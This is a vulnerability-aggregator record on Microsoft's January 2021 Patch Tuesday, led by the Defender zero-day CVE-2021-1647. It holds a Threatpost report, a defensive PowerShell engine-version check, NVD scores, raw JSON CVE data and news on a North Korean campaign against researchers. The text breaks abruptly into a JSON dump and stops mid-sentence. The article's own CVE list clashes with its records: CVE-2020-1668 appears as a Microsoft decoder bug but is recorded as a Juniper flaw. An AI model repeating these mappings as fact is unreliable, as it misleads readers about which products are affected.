ID THREATPOST:B879E243998561911585BBD37B7F33E9 Type threatpost Reporter Tom Spring Modified 2021-01-12T21:45:23
Description
Microsoft addressed 10 critical bugs, one under active exploit and another publicly known, in its January Patch Tuesday roundup of fixes. In total it patched 83 vulnerabilities.
The most serious bug is a flaw in Microsoft’s Defender anti-malware software that allows remote attackers to infect targeted systems with executable code. Security experts are warning that Windows users whose systems have not connected to the internet recently, and so have not received the auto-update, should patch now.
“This bug in the Microsoft Malware Protection Engine may already be patched on your system as the engine auto-updates as needed. However, if your systems are not connected to the internet, you’ll need to manually apply the patch,” wrote Dustin Childs, Trend Micro’s Zero Day Initiative (ZDI) security manager.
Researchers believe the vulnerability, tracked as CVE-2021-1647, has been exploited for the past three months and was leveraged by hackers as part of the massive SolarWinds attack. Last month, Microsoft said state-sponsored hackers had compromised its internal network and leveraged additional Microsoft products to conduct further attacks.
Affected versions of the Microsoft Malware Protection Engine range from 1.1.17600.5 to 1.1.17700.4 running on Windows 10, Windows 7 and Windows Server, version 2004, according to the security bulletin.
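The check the passage above calls for, as an added example that is not from the Threatpost article, Microsoft or ZDI: it reads the local Malware Protection Engine build through the Defender PowerShell module and reports whether the engine still predates the fixed build, which matters on hosts that never reach the internet and therefore never receive the engine auto-update. It assumes `Get-MpComputerStatus` is available (Windows 10 / Windows Server with the Defender module) and treats 1.1.17700.4, the top of the range the article quotes, as the first fixed build; confirm that boundary against the MSRC advisory for CVE-2021-1647 before relying on it.

```powershell
# Added example, not code from the article or from Microsoft.
# Assumption: 1.1.17700.4 (the upper end of the range the article lists) is the
# first fixed Malware Protection Engine build. Verify against the MSRC advisory.
$FixedBuild = [version]'1.1.17700.4'

function Test-MpEngineVersion {
    param(
        # Engine version to evaluate; defaults to the live value reported by Defender.
        [string]$EngineVersion = (Get-MpComputerStatus).AMEngineVersion
    )
    $v = [version]$EngineVersion
    [pscustomobject]@{
        EngineVersion = $v.ToString()
        FixedBuild    = $FixedBuild.ToString()
        NeedsUpdate   = ($v -lt $FixedBuild)   # any build older than the fix needs the update
    }
}

# Live check on this host, with the signature timestamp as a hint of how stale
# an offline machine is.
$status = Get-MpComputerStatus
$result = Test-MpEngineVersion -EngineVersion $status.AMEngineVersion
$result | Add-Member -NotePropertyName SignaturesLastUpdated `
                    -NotePropertyValue $status.AntivirusSignatureLastUpdated
$result | Format-List

if ($result.NeedsUpdate) {
    # Offline hosts never auto-update: the engine package has to be staged and applied by hand.
    Write-Warning "Engine $($result.EngineVersion) predates the fixed build $FixedBuild; apply the engine update manually and re-run this check."
}
else {
    Write-Host "Engine $($result.EngineVersion) is at or beyond the fixed build $FixedBuild."
}
```

On a connected host, `Update-MpSignature` pulls the current engine and definitions and the check should pass afterwards; on an isolated host the function is useful as a fleet-wide inventory step (run it with `-EngineVersion` against values collected elsewhere) to find machines that still need the manual update.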
Publicly Known Bug Fixed Twice
Microsoft patched a second vulnerability, tracked as CVE-2021-1648, that researchers believe was also being exploited in the wild. The flaw is classified as an elevation-of-privilege bug and impacts the Windows print driver process SPLWOW64.exe.
The bug was first discovered by Google and patched. But ZDI believes that patch was insufficient and opened the door to further attacks. Childs said that ZDI rediscovered the flaw, which Microsoft patched again on Tuesday.
“The previous patch introduced a function to check an input string pointer, but in doing so, it introduced an Out-of-Bounds (OOB) Read condition. Additional bugs are also covered by this patch, including an untrusted pointer deref,” Childs wrote in a prepared Patch Tuesday analysis.
Additional Critical Bugs
Eight additional bugs rated critical were also part of Microsoft’s Tuesday vulnerability fixes.
These included a remote code-execution bug in Microsoft’s Edge web browser. The vulnerability (CVE-2021-1705) is memory-related and tied to the way the browser improperly accesses objects in memory.
“Successful exploitation of the vulnerability could enable an attacker to gain the same privileges as the current user,” wrote Justin Knapp, senior product marketing manager with Automox, in prepared analysis. “If the current user is logged on with admin rights, an attacker could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights. An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website.”
Additional critical bugs were tied to Windows Graphics Device Interface (CVE-2021-1665), HEVC Video Extensions (CVE-2020-1643), and the Microsoft DTV-DVD Video Decoder (CVE-2020-1668).
Five January Patch Tuesday flaws (CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667 and CVE-2021-1673) were each remote procedure call bugs. As the name suggests, the vulnerability exists in the Windows Remote Procedure Call authentication process. If exploited, an attacker could gain elevated privileges, run a specially crafted application and take complete control of the targeted system.
“With the SolarWinds breach still fresh from December and the scope of impact growing by the day, there’s a reaffirmed urgency for organizations to implement best practices for even the most basic security habits,” Knapp wrote. “Whether it’s patching zero-day vulnerabilities within a 24-hour window or implementing strong password protocols, the need for security diligence has never been more evident.”
Title: Critical Microsoft Defender Bug Actively Exploited; Patch Tuesday Offers 83 Fixes
Source: https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/
Published: 2021-01-12T21:45:23
CVEs referenced: CVE-2020-1643, CVE-2020-1668, CVE-2021-1647, CVE-2021-1648, CVE-2021-1658, CVE-2021-1660, CVE-2021-1665, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1705
References:
- Microsoft Security Update Guide (January Patch Tuesday): https://msrc.microsoft.com/update-guide
- Microsoft advisory for CVE-2021-1647: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647
- Microsoft advisory for CVE-2021-1648: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648
- ZDI, The January 2021 Security Update Review: https://www.zerodayinitiative.com/blog/2021/1/12/the-january-2021-security-update-review
- Threatpost, SolarWinds hack linked to Turla APT: https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/
- Goliath Technologies, troubleshooting SPLWOW64.exe issues: https://goliathtechnologies.com/troubleshoot-resolve-citrix-splwow64-exe-issues-p
NVD records for the CVEs referenced by the article (aggregated with it; values as recorded by NVD at the time)

| CVE | NVD title | CVSS v3.1 base (vector) | CVSS v2 base (vector) | CWE | NVD last modified |
|---|---|---|---|---|---|
| CVE-2021-1658 | Remote Procedure Call Runtime Remote Code Execution Vulnerability | 8.8 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | 6.5 Medium (AV:N/AC:L/Au:S/C:P/I:P/A:P) | NVD-CWE-noinfo | 2021-01-20 |
| CVE-2021-1660 | Remote Procedure Call Runtime Remote Code Execution Vulnerability | 8.8 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | 6.5 Medium (AV:N/AC:L/Au:S/C:P/I:P/A:P) | NVD-CWE-noinfo | 2021-01-20 |
| CVE-2021-1666 | Remote Procedure Call Runtime Remote Code Execution Vulnerability | 8.8 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | 6.5 Medium (AV:N/AC:L/Au:S/C:P/I:P/A:P) | NVD-CWE-noinfo | 2021-01-19 |
| CVE-2021-1673 | Remote Procedure Call Runtime Remote Code Execution Vulnerability | 8.8 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | 6.5 Medium (AV:N/AC:L/Au:S/C:P/I:P/A:P) | NVD-CWE-noinfo | 2021-01-20 |
| CVE-2021-1647 | Microsoft Defender Remote Code Execution Vulnerability | 7.8 High (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | 7.2 High (AV:L/AC:L/Au:N/C:C/I:C/A:C) | NVD-CWE-noinfo | 2021-01-14 |
| CVE-2021-1665 | GDI+ Remote Code Execution Vulnerability | 7.8 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) | 6.8 Medium (AV:N/AC:M/Au:N/C:P/I:P/A:P) | NVD-CWE-noinfo | 2021-01-20 |
| CVE-2021-1648 | Microsoft splwow64 Elevation of Privilege Vulnerability | 7.8 High (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | 7.2 High (AV:L/AC:L/Au:N/C:C/I:C/A:C) | CWE-269 | 2021-03-04 |
| CVE-2021-1705 | Microsoft Edge (HTML-based) Memory Corruption Vulnerability | 7.5 High (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) | 7.6 High (AV:N/AC:H/Au:N/C:C/I:C/A:C) | NVD-CWE-noinfo | 2021-01-20 |

Affected products as listed in the NVD CPE data:
- The four Remote Procedure Call Runtime entries and CVE-2021-1665 (GDI+): Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 (1607, 1803, 1809, 1909, 2004, 20H2), Windows Server 2008 SP2 and 2008 R2 SP1, Windows Server 2012 and 2012 R2, Windows Server 2016 (including 1909, 2004 and 20H2) and Windows Server 2019.
- CVE-2021-1648 (splwow64): the same Windows list without Windows 7, Windows RT 8.1 and Windows Server 2008 / 2008 R2.
- CVE-2021-1647 (Defender): Microsoft Security Essentials, System Center Endpoint Protection (including 2012 and 2012 R2) and Windows Defender.
- CVE-2021-1705: Microsoft Edge (HTML-based).

The NVD descriptions note that each Remote Procedure Call Runtime CVE is distinct from CVE-2021-1664, CVE-2021-1671, CVE-2021-1700 and CVE-2021-1701, which the article does not cover. One further Remote Procedure Call Runtime record (published 2021-01-12, CVSS v3.1 8.8 with the same vector) is cut off in the source before its identifier.
"title": "CVE-2021-1667", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1667"], "modified": "2021-01-20T20:33:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1667", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1667", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-06T14:31:25", "description": "On Juniper Networks EX2300 Series, receipt of a stream of specific multicast packets by the layer2 interface can cause high CPU load, which could lead to traffic interruption. This issue occurs when multicast packets are received by the layer 2 interface. To check if the device has high CPU load due to this issue, the administrator can issue the following command: user@host> show chassis routing-engine Routing Engine status: ... Idle 2 percent the \"Idle\" value shows as low (2 % in the example above), and also the following command: user@host> show system processes summary ... PID USERNAME PRI NICE SIZE RES STATE TIME WCPU COMMAND 11639 root 52 0 283M 11296K select 12:15 44.97% eventd 11803 root 81 0 719M 239M RUN 251:12 31.98% fxpc{fxpc} the eventd and the fxpc processes might use higher WCPU percentage (respectively 44.97% and 31.98% in the above example). 
This issue affects Juniper Networks Junos OS on EX2300 Series: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-10-16T21:15:00", "title": "CVE-2020-1668", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1668"], "modified": "2020-10-27T18:27:00", "cpe": ["cpe:/o:juniper:junos:18.4", "cpe:/o:juniper:junos:20.1", "cpe:/o:juniper:junos:19.3", "cpe:/o:juniper:junos:18.1", "cpe:/o:juniper:junos:18.3", "cpe:/o:juniper:junos:19.4", "cpe:/o:juniper:junos:18.2", "cpe:/o:juniper:junos:19.1", "cpe:/o:juniper:junos:19.2"], "id": "CVE-2020-1668", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1668", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, 
"cpe23": ["cpe:2.3:o:juniper:junos:18.1:r3-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:20.1:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s8:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r2-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s10:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1:-:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.4:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.4:r2:*:*:*:*:*:*", 
"cpe:2.3:o:juniper:junos:19.3:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.3:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r3-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.4:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r2-s4:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.2:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:r1-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r3-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r1-s5:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.4:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s3:*:*:*:*:*:*", 
"cpe:2.3:o:juniper:junos:18.1:r3-s9:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:20.1:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r1-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.4:r1-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r3-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.2:r2-s6:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:19.1:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.1:r3-s7:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos:18.3:r2-s2:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2021-01-13T06:30:13", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1674", "CVE-2021-1705"], "description": "[](<https://thehackernews.com/images/-cZjUACk7bgA/X_5-UYTlv-I/AAAAAAAABec/V3IW_ZyIh9k3keOxtl2lI0PDNAaEMTRQACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nFor the first patch Tuesday of 2021, Microsoft released [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>) addressing a total of 83 flaws spanning as many as 11 products and services, including an actively exploited zero-day vulnerability.\n\nThe latest security patches cover Microsoft Windows, Edge browser, ChakraCore, Office and Microsoft Office Services, and Web Apps, Visual Studio, Microsoft Malware Protection Engine, .NET Core, ASP .NET, and Azure. Of these 83 bugs, 10 are listed as Critical, and 73 are listed as Important in severity.\n\nThe most severe of the issues is a remote code execution (RCE) flaw in Microsoft Defender ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) that could allow attackers to infect targeted systems with arbitrary code.\n\nMicrosoft Malware Protection Engine (mpengine.dll) provides the scanning, detection, and cleaning capabilities for Microsoft Defender antivirus and antispyware software. 
The last version of the software affected by the flaw is 1.1.17600.5, before it was addressed in version 1.1.17700.4.\n\nThe bug is also known to have been actively exploited in the wild, although details are scarce on how widespread the attacks are or how this is being exploited. It's also a zero-click flaw in that the vulnerable system can be exploited without any interaction from the user.\n\nMicrosoft said that despite active exploitation, the technique is not functional in all situations and that the exploit is still considered to be at a proof-of-concept level, with substantial modifications required for it to work effectively.\n\nWhat's more, the flaw may already be resolved as part of automatic updates to the Malware Protection Engine \u2014 which it typically releases once a month or when required to safeguard against newly discovered threats \u2014 unless the systems are not connected to the Internet.\n\n\"For organizations that are configured for automatic updating, no actions should be required, but one of the first actions a threat actor or malware will try to attempt is to disrupt threat protection on a system so definition and engine updates are blocked,\" said Chris Goettl, senior director of product management and security at Ivanti.\n\nTuesday's patch also rectifies a privilege escalation flaw ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) introduced by a previous patch in the GDI Print / Print Spooler API (\"splwow64.exe\") that was [disclosed by Google Project Zero](<https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html>) last month after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOther vulnerabilities fixed by Microsoft include a memory corruption flaw in Microsoft Edge browser ([CVE-2021-1705](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1705>)), a Windows Remote Desktop Protocol Core Security 
feature bypass flaw ([CVE-2021-1674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1674>), CVSS score 8.8), and five critical RCE flaws in Remote Procedure Call Runtime.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or select Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-01-13T05:01:20", "published": "2021-01-13T05:01:00", "id": "THN:9CF96D7230D0DBA395C1DEDA718226AD", "href": "https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html", "type": "thn", "title": "Microsoft Issues Patches for Defender Zero-Day and 82 Other Windows Flaws", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-29T10:26:41", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "[](<https://thehackernews.com/images/-iuZmw75wd8g/YA-j-PbeyrI/AAAAAAAABlE/RgTbZC607W00K50gmsHyQ2wxzElQjkCMwCLcBGAsYHQ/s0/north-korean-hackers.jpg>)\n\nGoogle on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development.\n\nThe internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust.\n\nThe goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice.\n\n[](<https://go.thn.li/password-auditor> \"password 
auditor\" )\n\n\"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers,\" [said](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) TAG researcher Adam Weidemann.\n\nThe attackers created as many as 10 fake Twitter personas and five LinkedIn profiles, which they used to engage with the researchers, share videos of exploits, retweet other attacker-controlled accounts, and share links to their purported research blog.\n\nIn one instance, the actor used Twitter to share a YouTube video of what it claimed to be an exploit for a recently patched Windows Defender flaw ([CVE-2021-1647](<https://thehackernews.com/2021/01/microsoft-issues-patches-for-defender.html>)), when in reality, the exploit turned out to be fake.\n\n[](<https://thehackernews.com/images/-z357EvP7xhQ/YA-h_c5mACI/AAAAAAAABk4/Rfunq4GEsRYSpfML7a1rW1uzau-Y92QCQCLcBGAsYHQ/s0/twitter.jpg>)\n\nThe North Korean hackers are also said to have used a \"novel social engineering method\" to hit security researchers by asking them if they would like to collaborate on vulnerability research together and then provide the targeted individual with a Visual Studio Project.\n\nThis Visual Studio Project, besides containing the source code for exploiting the vulnerability, included a custom malware that establishes communication with a remote command-and-control (C2) server to execute arbitrary commands on the compromised system.\n\nKaspersky researcher Costin Raiu, in a [tweet](<https://twitter.com/craiu/status/1353964086455902208>), noted the malware delivered via the project shared code-level similarities with [Manuscrypt](<https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer>) (aka FAILCHILL or Volgmer), a previously known Windows backdoor deployed by the Lazarus 
Group.\n\nWhat's more, TAG said it observed several cases where researchers were infected after visiting the research blog, following which a malicious service was installed on the machine, and an in-memory backdoor would begin beaconing to a C2 server.\n\n[](<https://thehackernews.com/images/-5WNEGS3rJFg/YA-ht9CNs1I/AAAAAAAABkw/Q6gouDrb7eg3yZSUK7zlsoHZh-S_1heVACLcBGAsYHQ/s0/security-reseachers.jpg>)\n\nWith the victim systems running fully patched and up-to-date versions of Windows 10 and Chrome web browser, the exact mechanism of compromise remains unknown. But it's suspected that the threat actor likely leveraged zero-day vulnerabilities in Windows 10 and Chrome to deploy the malware.\n\n\"If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research,\" Weidemann said.\n\n### UPDATE (28 Jan, 2021): Microsoft releases more information on this campaign\n\nIn a separate analysis, Microsoft corroborated the findings, attributing the attacks to a threat actor it calls ZINC, also known as Lazarus Group or Hidden Cobra.\n\nThe Windows maker said the campaign took root in mid-2020 when the adversary \"started building a reputation in the security research community on Twitter by retweeting high quality security content and posting about exploit research from an 